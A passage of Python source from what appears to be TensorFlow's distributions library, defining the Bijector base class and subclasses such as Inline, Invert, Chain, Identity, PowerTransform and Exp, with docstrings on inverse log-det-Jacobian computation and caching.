`_inverse`, `_inverse_log_det_jacobian`, - `_inverse_and_inverse_log_det_jacobian`. - If the `Bijector`'s use is limited to `TransformedDistribution` (or friends like `QuantizedDistribution`) then depending on your use, you may not need to implement all of `_forward` and `_inverse` functions. Examples: 1. Sampling (e.g., `sample`) only requires `_forward`. 2. Probability functions (e.g., `prob`, `cdf`, `survival`) only require `_inverse` (and related). 3. Only calling probability functions on the output of `sample` means `_inverse` can be implemented as a cache lookup. See `Example Use` [above] which shows how these functions are used to transform a distribution. (Note: `_forward` could theoretically be implemented as a cache lookup but this would require controlling the underlying sample generation mechanism.) - If computation can be shared among `_inverse` and `_inverse_log_det_jacobian` it is preferable to implement `_inverse_and_inverse_log_det_jacobian`. This usually reduces graph-construction overhead because a `Distribution`'s implementation of `log_prob` will need to evaluate both the inverse Jacobian as well as the inverse function. - If an additional use case needs just `inverse` or just `inverse_log_det_jacobian` then he or she may also wish to implement these functions to avoid computing the `inverse_log_det_jacobian` or the `inverse`, respectively. - Subclasses should implement `_get_forward_event_shape`, `_forward_event_shape` (and `inverse` counterparts) if the transformation is shape-changing. By default the event-shape is assumed unchanged from input. Tips for implementing `_inverse` and `_inverse_log_det_jacobian`: - As case 3 [above] indicates, under some circumstances the inverse function can be implemented as a cache lookup. - The inverse `log o det o Jacobian` can be implemented as the negative of the forward `log o det o Jacobian`. This is useful if the `inverse` is implemented as a cache or the inverse Jacobian is computationally more expensive (e.g., `CholeskyOuterProduct` `Bijector`). The following demonstrates the suggested implementation. ```python def _inverse_and_log_det_jacobian(self, y): x = # ... implement inverse, possibly via cache. return x, -self._forward_log_det_jac(x) # Note negation. ``` By overriding the `_inverse_and_log_det_jacobian` function we have access to the inverse in one call. The correctness of this approach can be seen from the following claim. - Claim: Assume `Y=g(X)` is a bijection whose derivative exists and is nonzero for its domain, i.e., `d/dX g(X)!=0`. Then: ```none (log o det o jacobian o g^{-1})(Y) = -(log o det o jacobian o g)(X) ``` - Proof: From the bijective, nonzero differentiability of `g`, the [inverse function theorem]( https://en.wikipedia.org/wiki/Inverse_function_theorem) implies `g^{-1}` is differentiable in the image of `g`. Applying the chain rule to `y = g(x) = g(g^{-1}(y))` yields `I = g'(g^{-1}(y))*g^{-1}'(y)`. The same theorem also implies `g{-1}'` is non-singular therefore: `inv[ g'(g^{-1}(y)) ] = g^{-1}'(y)`. The claim follows from [properties of determinant]( https://en.wikipedia.org/wiki/Determinant#Multiplicativity_and_matrix_groups). - If possible, prefer a direct implementation of the inverse Jacobian. This should have superior numerical stability and will often share subgraphs with the `_inverse` implementation. """ @abc.abstractmethod def __init__(self, batch_ndims=None, event_ndims=None, graph_parents=None, is_constant_jacobian=False, validate_args=False, dtype=None, name=None): """Constructs Bijector. A `Bijector` transforms random variables into new random variables. Examples: ```python # Create the Y = g(X) = X transform which operates on 4-Tensors of vectors. identity = Identity(batch_ndims=4, event_ndims=1) # Create the Y = g(X) = exp(X) transform which operates on matrices. exp = Exp(batch_ndims=0, event_ndims=2) ``` See `Bijector` subclass docstring for more details and specific examples. Args: batch_ndims: number of dimensions associated with batch coordinates. event_ndims: number of dimensions associated with event coordinates. graph_parents: Python list of graph prerequisites of this `Bijector`. is_constant_jacobian: `Boolean` indicating that the Jacobian is not a function of the input. validate_args: `Boolean`, default `False`. Whether to validate input with asserts. If `validate_args` is `False`, and the inputs are invalid, correct behavior is not guaranteed. dtype: `tf.dtype` supported by this `Bijector`. `None` means dtype is not enforced. name: The name to give Ops created by the initializer. """ if batch_ndims is None or event_ndims is None: self._shaper = None # Apparently subclass will create. else: self._shaper = _DistributionShape( batch_ndims=batch_ndims, event_ndims=event_ndims, validate_args=validate_args) self._graph_parents = graph_parents or [] self._is_constant_jacobian = is_constant_jacobian self._validate_args = validate_args self._dtype = dtype self._from_y = {} self._from_x = {} # Using abbreviation ildj for "inverse log det Jacobian." # This variable is not `None` iff is_constant_jacobian is `True`. self._constant_ildj = None if name: self._name = name else: # We want the default convention to be snake_case rather than CamelCase # since `Chain` uses bijector.name as the condition_kwargs dictionary key. def camel_to_snake(name): s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name) return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower() self._name = camel_to_snake(type(self).__name__) @property def shaper(self): """Returns shape object used to manage shape constraints.""" return self._shaper @property def graph_parents(self): """Returns this `Bijector`'s graph_parents as a Python list.""" return self._graph_parents @property def is_constant_jacobian(self): """Returns true iff the Jacobian is not a function of x. Note: Jacobian is either constant for both forward and inverse or neither. Returns: `Boolean`. """ return self._is_constant_jacobian @property def validate_args(self): """Returns True if Tensor arguments will be validated.""" return self._validate_args @property def dtype(self): """dtype of `Tensor`s transformable by this distribution.""" return self._dtype @property def name(self): """Returns the string name of this `Bijector`.""" return self._name def _forward_event_shape(self, input_shape): """Subclass implementation for `forward_event_shape` public function.""" return input_shape def forward_event_shape(self, input_shape, name="forward_event_shape"): """Shape of a single sample from a single batch as an `int32` 1D `Tensor`. Args: input_shape: `Tensor`, `int32` vector indicating event-portion shape passed into `forward` function. name: name to give to the op Returns: forward_event_shape: `Tensor`, `int32` vector indicating event-portion shape after applying `forward`. """ with self._name_scope(name, [input_shape]): input_shape = ops.convert_to_tensor(input_shape, dtype=dtypes.int32, name="input_shape") return self._forward_event_shape(input_shape) def _get_forward_event_shape(self, input_shape): """Subclass implementation for `get_forward_event_shape` public function.""" return input_shape def get_forward_event_shape(self, input_shape): """Shape of a single sample from a single batch as a `TensorShape`. Same meaning as `forward_event_shape`. May be only partially defined. Args: input_shape: `TensorShape` indicating event-portion shape passed into `forward` function. Returns: forward_event_shape: `TensorShape` indicating event-portion shape after applying `forward`. Possibly unknown. """ return self._get_forward_event_shape(tensor_shape.TensorShape(input_shape)) def _inverse_event_shape(self, output_shape): """Subclass implementation for `inverse_event_shape` public function.""" return output_shape def inverse_event_shape(self, output_shape, name="inverse_event_shape"): """Shape of a single sample from a single batch as an `int32` 1D `Tensor`. Args: output_shape: `Tensor`, `int32` vector indicating event-portion shape passed into `inverse` function. name: name to give to the op Returns: inverse_event_shape: `Tensor`, `int32` vector indicating event-portion shape after applying `inverse`. """ with self._name_scope(name, [output_shape]): output_shape = ops.convert_to_tensor(output_shape, dtype=dtypes.int32, name="output_shape") return self._inverse_event_shape(output_shape) def _get_inverse_event_shape(self, output_shape): """Subclass implementation for `get_inverse_event_shape` public function.""" return self._get_inverse_event_shape(tensor_shape.TensorShape(output_shape)) def get_inverse_event_shape(self, output_shape): """Shape of a single sample from a single batch as a `TensorShape`. Same meaning as `inverse_event_shape`. May be only partially defined. Args: output_shape: `TensorShape` indicating event-portion shape passed into `inverse` function. Returns: inverse_event_shape: `TensorShape` indicating event-portion shape after applying `inverse`. Possibly unknown. """ return self._get_inverse_event_shape(output_shape) def _forward(self, x): """Subclass implementation for `forward` public function.""" raise NotImplementedError("forward not implemented.") def forward(self, x, name="forward", **condition_kwargs): """Returns the forward `Bijector` evaluation, i.e., X = g(Y). Args: x: `Tensor`. The input to the "forward" evaluation. name: The name to give this op. **condition_kwargs: Named arguments forwarded to subclass implementation. Returns: `Tensor`. Raises: TypeError: if `self.dtype` is specified and `x.dtype` is not `self.dtype`. NotImplementedError: if `_forward` is not implemented. """ with self._name_scope(name, [x]): x = ops.convert_to_tensor(x, name="x") self._maybe_assert_dtype(x) mapping = self._lookup(x=x, condition_kwargs=condition_kwargs) if mapping.y is not None: return mapping.y mapping = mapping.merge(y=self._forward(x, **condition_kwargs)) self._cache(mapping) return mapping.y def _inverse(self, y): """Subclass implementation for `inverse` public function.""" raise NotImplementedError("inverse not implemented") def inverse(self, y, name="inverse", **condition_kwargs): """Returns the inverse `Bijector` evaluation, i.e., X = g^{-1}(Y). Args: y: `Tensor`. The input to the "inverse" evaluation. name: The name to give this op. **condition_kwargs: Named arguments forwarded to subclass implementation. Returns: `Tensor`. Raises: TypeError: if `self.dtype` is specified and `y.dtype` is not `self.dtype`. NotImplementedError: if neither `_inverse` nor `_inverse_and_inverse_log_det_jacobian` are implemented. """ with self._name_scope(name, [y]): y = ops.convert_to_tensor(y, name="y") self._maybe_assert_dtype(y) mapping = self._lookup(y=y, condition_kwargs=condition_kwargs) if mapping.x is not None: return mapping.x ildj = None try: x = self._inverse(y, **condition_kwargs) except NotImplementedError as original_error: # Since _inverse was not implemented, try to see if it's implemented # by the _inverse_and_inverse_log_det_jacobian member. try: x, ildj = self._inverse_and_inverse_log_det_jacobian( y, **condition_kwargs) except NotImplementedError: raise original_error if self._constant_ildj is not None: ildj = self._constant_ildj # Use the "global" result. elif self.is_constant_jacobian: self._constant_ildj = ildj x = x if mapping.x is None else mapping.x mapping = mapping.merge(x=x, ildj=ildj) self._cache(mapping) return mapping.x def _inverse_log_det_jacobian(self, y): """Subclass implementation for `inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long raise NotImplementedError("inverse_log_det_jacobian not implemented.") def inverse_log_det_jacobian( self, y, name="inverse_log_det_jacobian", **condition_kwargs): """Returns the (log o det o Jacobian o inverse)(y). Mathematically, returns: `log(det(dX/dY))(Y)`. (Recall that: `X=g^{-1}(Y)`.) Note that `forward_log_det_jacobian` is the negative of this function. Args: y: `Tensor`. The input to the "inverse" Jacobian evaluation. name: The name to give this op. **condition_kwargs: Named arguments forwarded to subclass implementation. Returns: `Tensor`. Raises: TypeError: if `self.dtype` is specified and `y.dtype` is not `self.dtype`. NotImplementedError: if neither `_inverse_log_det_jacobian` nor `_inverse_and_inverse_log_det_jacobian` are implemented. """ with self._name_scope(name, [y]): if self._constant_ildj is not None: return self._constant_ildj y = ops.convert_to_tensor(y, name="y") self._maybe_assert_dtype(y) mapping = self._lookup(y=y, condition_kwargs=condition_kwargs) if mapping.ildj is not None: return mapping.ildj try: x = mapping.x ildj = self._inverse_log_det_jacobian(y, **condition_kwargs) except NotImplementedError as original_error: # Since _inverse_log_det_jacobian was not implemented, try to see if # it's implemented by the _inverse_and_inverse_log_det_jacobian member. try: x, ildj = self._inverse_and_inverse_log_det_jacobian( y, **condition_kwargs) except NotImplementedError: raise original_error if mapping.x is not None: x = mapping.x if self.is_constant_jacobian: self._constant_ildj = ildj x = x if mapping.x is None else mapping.x mapping = mapping.merge(x=x, ildj=ildj) self._cache(mapping) return mapping.ildj def _inverse_and_inverse_log_det_jacobian(self, y): """Subclass implementation for `inverse_and_inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long raise NotImplementedError( "inverse_and_inverse_log_det_jacobian not implemented.") def inverse_and_inverse_log_det_jacobian( self, y, name="inverse_and_inverse_log_det_jacobian", **condition_kwargs): """Returns both the inverse evaluation and inverse_log_det_jacobian. Enables possibly more efficient calculation when both inverse and corresponding Jacobian are needed. See `inverse()`, `inverse_log_det_jacobian()` for more details. Args: y: `Tensor`. The input to the "inverse" Jacobian evaluation. name: The name to give this op. **condition_kwargs: Named arguments forwarded to subclass implementation. Returns: `Tensor`. Raises: TypeError: if `self.dtype` is specified and `y.dtype` is not `self.dtype`. NotImplementedError: if neither `_inverse_and_inverse_log_det_jacobian` nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented. """ with self._name_scope(name, [y]): y = ops.convert_to_tensor(y, name="y") self._maybe_assert_dtype(y) mapping = self._lookup(y=y, condition_kwargs=condition_kwargs) if mapping.x is not None and mapping.ildj is not None: return mapping.x, mapping.ildj try: x, ildj = self._inverse_and_inverse_log_det_jacobian( y, **condition_kwargs) except NotImplementedError as original_error: # Since _inverse_and_inverse_log_det_jacobian was not implemented, try # to see if we can separately use _inverse and # _inverse_log_det_jacobian members. try: # We want this same try/except to catch either NotImplementedError. x = self._inverse(y, **condition_kwargs) if self._constant_ildj is None: ildj = self._inverse_log_det_jacobian(y, **condition_kwargs) except NotImplementedError: raise original_error if self._constant_ildj is not None: ildj = self._constant_ildj # Ignore any ildj we may/not have. elif self.is_constant_jacobian: self._constant_ildj = ildj # We use the mapped version of x, even if we re-computed x above with a # call to self._inverse_and_inverse_log_det_jacobian. This prevents # re-evaluation of the inverse in a common case. x = x if mapping.x is None else mapping.x mapping = mapping.merge(x=x, ildj=ildj) self._cache(mapping) return mapping.x, mapping.ildj def _forward_log_det_jacobian(self, x): """Subclass implementation for `forward_log_det_jacobian` public function.""" # pylint: disable=line-too-long raise NotImplementedError( "forward_log_det_jacobian not implemented.") def forward_log_det_jacobian( self, x, name="forward_log_det_jacobian", **condition_kwargs): """Returns both the forward_log_det_jacobian. Args: x: `Tensor`. The input to the "forward" Jacobian evaluation. name: The name to give this op. **condition_kwargs: Named arguments forwarded to subclass implementation. Returns: `Tensor`. Raises: TypeError: if `self.dtype` is specified and `y.dtype` is not `self.dtype`. NotImplementedError: if neither `_forward_log_det_jacobian` nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented. """ with self._name_scope(name, [x]): if self._constant_ildj is not None: # Need "-1. *" to avoid invalid-unary-operand-type linter warning. return -1. * self._constant_ildj x = ops.convert_to_tensor(x, name="x") self._maybe_assert_dtype(x) mapping = self._lookup(x=x, condition_kwargs=condition_kwargs) if mapping.ildj is not None: return -mapping.ildj y = None try: ildj = -self._forward_log_det_jacobian(x, **condition_kwargs) except NotImplementedError as original_error: try: # We want this same try/except to catch either NotImplementedError. y = self.inverse(x, **condition_kwargs) if y is None else y ildj = self.inverse_log_det_jacobian(y, **condition_kwargs) except NotImplementedError: raise original_error if self.is_constant_jacobian: self._constant_ildj = ildj y = y if mapping.y is None else mapping.y mapping = mapping.merge(y=y, ildj=ildj) self._cache(mapping) return -mapping.ildj @contextlib.contextmanager def _name_scope(self, name=None, values=None): """Helper function to standardize op scope.""" with ops.name_scope(self.name): with ops.name_scope( name, values=(values or []) + self.graph_parents) as scope: yield scope def _maybe_assert_dtype(self, x): """Helper to check dtype when self.dtype is known.""" if self.dtype is not None and self.dtype.base_dtype != x.dtype.base_dtype: raise TypeError("Input had dtype %s but expected %s." % (self.dtype, x.dtype)) def _cache(self, mapping): """Helper which stores mapping info in forward/inverse dicts.""" if self._constant_ildj is not None: # Fold in ildj if known constant Jacobian. mapping = mapping.merge(ildj=self._constant_ildj) # Merging from lookup is an added check that we're not overwriting anything # which is not None. mapping = mapping.merge(mapping=self._lookup( mapping.x, mapping.y, mapping.condition_kwargs)) if mapping.x is None and mapping.y is None: raise ValueError("Caching expects at least one of (x,y) to be known, " "i.e., not None.") self._from_x[mapping.x_key] = mapping self._from_y[mapping.y_key] = mapping def _lookup(self, x=None, y=None, condition_kwargs=None): """Helper which retrieves mapping info from forward/inverse dicts.""" mapping = _Mapping(x=x, y=y, condition_kwargs=condition_kwargs) # Since _cache requires both x,y to be set, we only need to do one cache # lookup since the mapping is always in both or neither. if mapping.x is not None: return self._from_x.get(mapping.x_key, mapping) if mapping.y is not None: return self._from_y.get(mapping.y_key, mapping) return mapping class Inline(Bijector): # pylint: disable=line-too-long """Bijector constructed from callables implementing forward, inverse, and inverse_log_det_jacobian. Example Use: ```python exp = Inline( forward_fn=tf.exp, inverse_fn=tf.log, inverse_log_det_jacobian_fn=( lambda y: -tf.reduce_sum(tf.log(y), reduction_indices=-1)), name="exp") ``` The above example is equivalent to the `Bijector` `Exp(event_ndims=1)`. """ # pylint: enable=line-too-long def __init__(self, forward_fn=None, inverse_fn=None, inverse_log_det_jacobian_fn=None, forward_log_det_jacobian_fn=None, get_forward_event_shape_fn=None, forward_event_shape_fn=None, get_inverse_event_shape_fn=None, inverse_event_shape_fn=None, is_constant_jacobian=False, validate_args=False, name="inline"): """Creates a `Bijector` from callables. Args: forward_fn: Python callable implementing the forward transformation. inverse_fn: Python callable implementing the inverse transformation. inverse_log_det_jacobian_fn: Python callable implementing the log o det o jacobian of the inverse transformation. forward_log_det_jacobian_fn: Python callable implementing the log o det o jacobian of the forward transformation. get_forward_event_shape_fn: Python callable implementing non-identical static event shape changes. Default: shape is assumed unchanged. forward_event_shape_fn: Python callable implementing non-identical event shape changes. Default: shape is assumed unchanged. get_inverse_event_shape_fn: Python callable implementing non-identical static event shape changes. Default: shape is assumed unchanged. inverse_event_shape_fn: Python callable implementing non-identical event shape changes. Default: shape is assumed unchanged. is_constant_jacobian: `Boolean` indicating that the Jacobian is constant for all input arguments. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String`, name given to ops managed by this object. """ super(Inline, self).__init__( batch_ndims=0, event_ndims=0, is_constant_jacobian=is_constant_jacobian, validate_args=validate_args, name=name) self._forward_fn = forward_fn self._inverse_fn = inverse_fn self._inverse_log_det_jacobian_fn = inverse_log_det_jacobian_fn self._forward_log_det_jacobian_fn = forward_log_det_jacobian_fn self._get_forward_event_shape_fn = get_forward_event_shape_fn self._forward_event_shape_fn = forward_event_shape_fn self._get_inverse_event_shape_fn = get_inverse_event_shape_fn self._inverse_event_shape_fn = inverse_event_shape_fn def _get_forward_event_shape(self, input_shape): if self._get_forward_event_shape_fn is None: # By default assume shape doesn't change. return input_shape return self._get_forward_event_shape_fn(input_shape) def _forward_event_shape(self, input_shape): if self._forward_event_shape_fn is None: # By default assume shape doesn't change. return input_shape return self._forward_event_shape_fn(input_shape) def _get_inverse_event_shape(self, output_shape): if self._get_inverse_event_shape_fn is None: # By default assume shape doesn't change. return output_shape return self._get_inverse_event_shape_fn(output_shape) def _inverse_event_shape(self, output_shape): if self._inverse_event_shape_fn is None: # By default assume shape doesn't change. return output_shape return self._inverse_event_shape_fn(output_shape) def _forward(self, x, **condition_kwargs): if not callable(self._forward_fn): raise NotImplementedError( "forward_fn is not a callable function.") return self._forward_fn(x, **condition_kwargs) def _inverse(self, y, **condition_kwargs): if not callable(self._inverse_fn): raise NotImplementedError( "inverse_fn is not a callable function.") return self._inverse_fn(y, **condition_kwargs) def _inverse_log_det_jacobian(self, y, **condition_kwargs): if not callable(self._inverse_log_det_jacobian_fn): raise NotImplementedError( "inverse_log_det_jacobian_fn is not a callable function.") return self._inverse_log_det_jacobian_fn(y, **condition_kwargs) def _forward_log_det_jacobian(self, y, **condition_kwargs): if not callable(self._forward_log_det_jacobian_fn): raise NotImplementedError( "forward_log_det_jacobian_fn is not a callable function.") return self._forward_log_det_jacobian_fn(y, **condition_kwargs) class Invert(Bijector): """Bijector which inverts another Bijector. Example Use: [ExpGammaDistribution (see Background & Context)]( https://reference.wolfram.com/language/ref/ExpGammaDistribution.html) models `Y=log(X)` where `X ~ Gamma`. ```python exp_gamma_distribution = TransformedDistribution( Gamma(alpha=1., beta=2.), bijector.Invert(bijector.Exp()) ``` """ def __init__(self, bijector, validate_args=False, name=None): """Creates a `Bijector` which swaps the meaning of `inverse` and `forward`. Note: An inverted bijector's `inverse_log_det_jacobian` is often more efficient if the base bijector implements `_forward_log_det_jacobian`. If `_forward_log_det_jacobian` is not implemented then the following code is used: ```python y = self.inverse(x, **condition_kwargs) return -self.inverse_log_det_jacobian(y, **condition_kwargs) ``` Args: bijector: Bijector instance. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String`, name given to ops managed by this object. """ self._bijector = bijector super(Invert, self).__init__( graph_parents=bijector.graph_parents, is_constant_jacobian=bijector.is_constant_jacobian, validate_args=validate_args, dtype=bijector.dtype, name=name or "_".join(["invert", bijector.name])) self._shaper = bijector.shaper def _get_forward_event_shape(self, input_shape): return self.bijector.get_inverse_event_shape(input_shape) def _forward_event_shape(self, input_shape): return self.bijector.inverse_event_shape(input_shape) def _get_inverse_event_shape(self, output_shape): return self.bijector.get_forward_event_shape(output_shape) def _inverse_event_shape(self, output_shape): return self.bijector.forward_event_shape(output_shape) @property def bijector(self): return self._bijector def _forward(self, x, **condition_kwargs): return self.bijector.inverse(x, **condition_kwargs) def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs): return (self.bijector.forward(y, **condition_kwargs), self.bijector.forward_log_det_jacobian(y, **condition_kwargs)) def _forward_log_det_jacobian(self, x, **condition_kwargs): return self.bijector.inverse_log_det_jacobian(x, **condition_kwargs) class Chain(Bijector): """Bijector which applies a sequence of bijectors. Example Use: ```python chain = Chain([Exp(), Softplus()], name="one_plus_exp") ``` Results in: * Forward: ```python exp = Exp() softplus = Softplus() Chain([exp, softplus]).forward(x) = exp.forward(softplus.forward(x)) = tf.exp(tf.log(1. + tf.exp(x))) = 1. + tf.exp(x) ``` * Inverse: ```python exp = Exp() softplus = Softplus() Chain([exp, softplus]).inverse(y) = softplus.inverse(exp.inverse(y)) = tf.log(tf.exp(tf.log(y)) - 1.) = tf.log(y - 1.) ``` """ def __init__(self, bijectors=(), validate_args=False, name=None): """Instantiates `Chain` bijector. Args: bijectors: Python list of bijector instances. An empty list makes this bijector equivalent to the `Identity` bijector. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String`, name given to ops managed by this object. Default: E.g., `Chain([Exp(), Softplus()]).name == "chain_of_exp_of_softplus"`. Raises: ValueError: if bijectors have different dtypes. """ self._bijectors = bijectors dtype = list(set([b.dtype for b in bijectors])) if len(dtype) > 2: raise ValueError("incompatible dtypes: %s" % dtype) elif len(dtype) == 2: dtype = dtype[1] if dtype[0] is None else dtype[0] elif len(dtype) == 1: dtype = dtype[0] else: dtype = None super(Chain, self).__init__( graph_parents=list(itertools.chain.from_iterable( b.graph_parents for b in bijectors)), is_constant_jacobian=all(b.is_constant_jacobian for b in bijectors), validate_args=validate_args, dtype=dtype, name=name or ("identity" if not bijectors else "_of_".join(["chain"] + [b.name for b in bijectors]))) @property def bijectors(self): return self._bijectors def _shape_helper(self, func_name, input_shape, reverse): new_shape = input_shape for b in reversed(self.bijectors) if reverse else self.bijectors: func = getattr(b, func_name, None) if func is None: raise ValueError("unable to call %s on bijector %s (%s)" % (func_name, b.name, func)) new_shape = func(new_shape) return new_shape def _get_forward_event_shape(self, input_shape): return self._shape_helper("get_forward_event_shape", input_shape, reverse=True) def _forward_event_shape(self, input_shape): return self._shape_helper("forward_event_shape", input_shape, reverse=True) def _get_inverse_event_shape(self, output_shape): return self._shape_helper("get_inverse_event_shape", output_shape, reverse=False) def _inverse_event_shape(self, output_shape): return self._shape_helper("inverse_event_shape", output_shape, reverse=False) def _forward(self, x, **condition_kwargs): y = x for b in reversed(self.bijectors): y = b.forward(y, **condition_kwargs.get(b.name, {})) return y def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs): x = y ildj = constant_op.constant(0., dtype=x.dtype, name="inverse_log_det_jacobian") for b in self.bijectors: x, j = b.inverse_and_inverse_log_det_jacobian( x, **condition_kwargs.get(b.name, {})) ildj += j return x, ildj def _forward_log_det_jacobian(self, x, **condition_kwargs): y = x fldj = constant_op.constant(0., dtype=x.dtype, name="forward_log_det_jacobian") for b in reversed(self.bijectors): bijector_condition_kwargs = condition_kwargs.get(b.name, {}) fldj += b.forward_log_det_jacobian(y, **bijector_condition_kwargs) y = b.forward(y, **bijector_condition_kwargs) return fldj class Identity(Bijector): """Bijector which computes Y = g(X) = X. Example Use: ```python # Create the Y=g(X)=X transform which is intended for Tensors with 1 batch # ndim and 1 event ndim (i.e., vector of vectors). identity = Identity(batch_ndims=1, event_ndims=1) x = [[1., 2], [3, 4]] x == identity.forward(x) == identity.inverse(x) ``` """ def __init__(self, validate_args=False, name="identity"): super(Identity, self).__init__( is_constant_jacobian=True, validate_args=validate_args, name=name) def _forward(self, x): return x def _inverse_and_inverse_log_det_jacobian(self, y): return y, constant_op.constant(0., dtype=y.dtype) def _forward_log_det_jacobian(self, x): return constant_op.constant(0., dtype=x.dtype) class PowerTransform(Bijector): """Bijector which computes `Y = g(X) = (1 + X * c)**(1 / c), X >= -1 / c`. The [power transform](https://en.wikipedia.org/wiki/Power_transform) maps inputs from `[0, inf]` to `[-1/c, inf]`; this is equivalent to the `inverse` of this bijector. This bijector is equivalent to the `Exp` bijector when `c=0`. """ def __init__(self, power=0., event_ndims=0, validate_args=False, name="power_transform"): """Instantiates the `PowerTransform` bijector. Args: power: Python `float` scalar indicating the transform power, i.e., `Y = g(X) = (1 + X * c)**(1 / c)` where `c` is the `power`. event_ndims: Python scalar indicating the number of dimensions associated with a particular draw from the distribution. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String` name given to ops managed by this object. Raises: ValueError: if `power < 0` or is not known statically. """ self._graph_parents = [] self._name = name self._validate_args = validate_args with self._name_scope("init", values=[power]): power = tensor_util.constant_value( ops.convert_to_tensor(power, name="power")) if power is None or power < 0: raise ValueError("`power` must be a non-negative TF constant.") self._power = power super(PowerTransform, self).__init__( batch_ndims=0, event_ndims=event_ndims, validate_args=validate_args, name=name) @property def power(self): """The `c` in: `Y = g(X) = (1 + X * c)**(1 / c)`.""" return self._power def _forward(self, x): x = self._maybe_assert_valid_x(x) if self.power == 0.: return math_ops.exp(x) # TODO(jvdillon): If large x accuracy is an issue, consider using # (1. + x * self.power)**(1. / self.power) when x >> 1. return math_ops.exp(math_ops.log1p(x * self.power) / self.power) def _inverse_and_inverse_log_det_jacobian(self, y): y = self._maybe_assert_valid_y(y) if self.shaper is None: raise ValueError("Jacobian cannot be computed with unknown event_ndims") _, _, event_dims = self.shaper.get_dims(y) if self.power == 0.: x = math_ops.log(y) ildj = -math_ops.reduce_sum(x, reduction_indices=event_dims) return x, ildj # TODO(jvdillon): If large y accuracy is an issue, consider using # (y**self.power - 1.) / self.power when y >> 1. x = _expm1(math_ops.log(y) * self.power) / self.power ildj = (self.power - 1.) * math_ops.reduce_sum( math_ops.log(y), reduction_indices=event_dims) return x, ildj def _forward_log_det_jacobian(self, x): x = self._maybe_assert_valid_x(x) if self.shaper is None: raise ValueError("Jacobian cannot be computed with unknown event_ndims") _, _, event_dims = self.shaper.get_dims(x) if self.power == 0.: return math_ops.reduce_sum(x, reduction_indices=event_dims) return (1. / self.power - 1.) * math_ops.reduce_sum( math_ops.log1p(x * self.power), reduction_indices=event_dims) def _maybe_assert_valid_x(self, x): if not self.validate_args or self.power == 0.: return x is_valid = check_ops.assert_non_negative( 1. + self.power * x, message="Forward transformation input must be at least {}.".format( -1. / self.power)) return control_flow_ops.with_dependencies([is_valid], x) def _maybe_assert_valid_y(self, y): if not self.validate_args: return y is_valid = check_ops.assert_positive( y, message="Inverse transformation input must be greater than 0.") return control_flow_ops.with_dependencies([is_valid], y) class Exp(PowerTransform): """Bijector which computes Y = g(X) = exp(X). Example Use: ```python # Create the Y=g(X)=exp(X) transform which works only on Tensors with 1 # batch ndim and 2 event ndims (i.e., vector of matrices). exp = Exp(batch_ndims=1, event_ndims=2) x = [[[1., 2], [3, 4]], [[5, 6], [7, 8]]] exp(x) == exp.forward(x) log(x) == exp.inverse(x) ``` Note: the exp(.) is applied element-wise but the Jacobian is a reduction over the event space. """ def __init__(self, event_ndims=0, validate_args=False, name="exp"): """Instantiates the `Exp` bijector. Args: event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions associated with a particular draw from the distribution. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String` name given to ops managed by this object. """ super(Exp, self).__init__( event_ndims=event_ndims, validate_args=validate_args, name=name) # TODO(srvasude): Deprecate this class with a dedicated Linear Operator # corresponding to TriL + V D V.T. class _TriLPlusVDVTLightweightOperatorPD(object): """Helper/hidden class fake an OperatorPD for TriL+VDV.T.""" def __init__(self, tril, v, diag=None, validate_args=False): """Creates an instance of _TriLPlusVDVTLightweightOperatorPD. WARNING: This object is not to be used outside of `Affine` where it is currently being temporarily used for refactoring purposes. Args: tril: `Tensor` of shape `[B1,..,Bb, d, d]`. v: `Tensor` of shape `[B1,...,Bb, d, k]`. diag: `Tensor` of shape `[B1,...,Bb, k, k]` or None validate_args: `Boolean` indicating whether arguments should be checked for correctness. """ self._m = tril self._v = v self._validate_args = validate_args self._inputs = [tril, v] if diag is not None: self._inputs += [diag] self._d = operator_pd_diag.OperatorPDDiag(diag, verify_pd=validate_args) self._d_inv = operator_pd_diag.OperatorPDDiag(1. / diag, verify_pd=validate_args) return if v.get_shape().is_fully_defined(): v_shape = v.get_shape().as_list() id_shape = v_shape[:-2] + [v_shape[-1], v_shape[-1]] else: v_shape = array_ops.shape(v) id_shape = array_ops.concat_v2( [v_shape[:-2], [v_shape[-1], v_shape[-1]]], 0) self._d = operator_pd_identity.OperatorPDIdentity( id_shape, v.dtype, verify_pd=self.validate_args) self._d_inv = self._d @property def inputs(self): return self._inputs @property def dtype(self): return self._m.dtype.base_dtype @property def validate_args(self): return self._validate_args def rank(self): """Returns `rank(self)`.""" return array_ops.rank(self._m) def sqrt_matmul(self, x): """Computes `matmul(self, x)`. Doesn't actually do the sqrt! Named as such to agree with API. Args: x: `Tensor` Returns: self_times_x: `Tensor` """ m_x = math_ops.matmul(self._m, x) vt_x = math_ops.matmul(self._v, x, adjoint_a=True) d_vt_x = self._d.matmul(vt_x) v_d_vt_x = math_ops.matmul(self._v, d_vt_x) return m_x + v_d_vt_x def sqrt_solve(self, x): """Computes `solve(self, x)`. Doesn't actually do the sqrt! Named as such to agree with API. To compute (M + V D V.T), we use the the Woodbury matrix identity: inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M) where, C = inv(D) + V.T inv(M) V. See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity Args: x: `Tensor` Returns: inv_of_self_times_x: `Tensor` """ minv_x = linalg_ops.matrix_triangular_solve(self._m, x) vt_minv_x = math_ops.matmul(self._v, minv_x, transpose_a=True) cinv_vt_minv_x = linalg_ops.matrix_solve( self._woodbury_sandwiched_term(), vt_minv_x) v_cinv_vt_minv_x = math_ops.matmul(self._v, cinv_vt_minv_x) minv_v_cinv_vt_minv_x = linalg_ops.matrix_triangular_solve( self._m, v_cinv_vt_minv_x) return minv_x - minv_v_cinv_vt_minv_x def sqrt_log_abs_det(self): """Computes (log o abs o det)(X) for matrix X. Doesn't actually do the sqrt! Named as such to agree with API. To compute det(M + V D V.T), 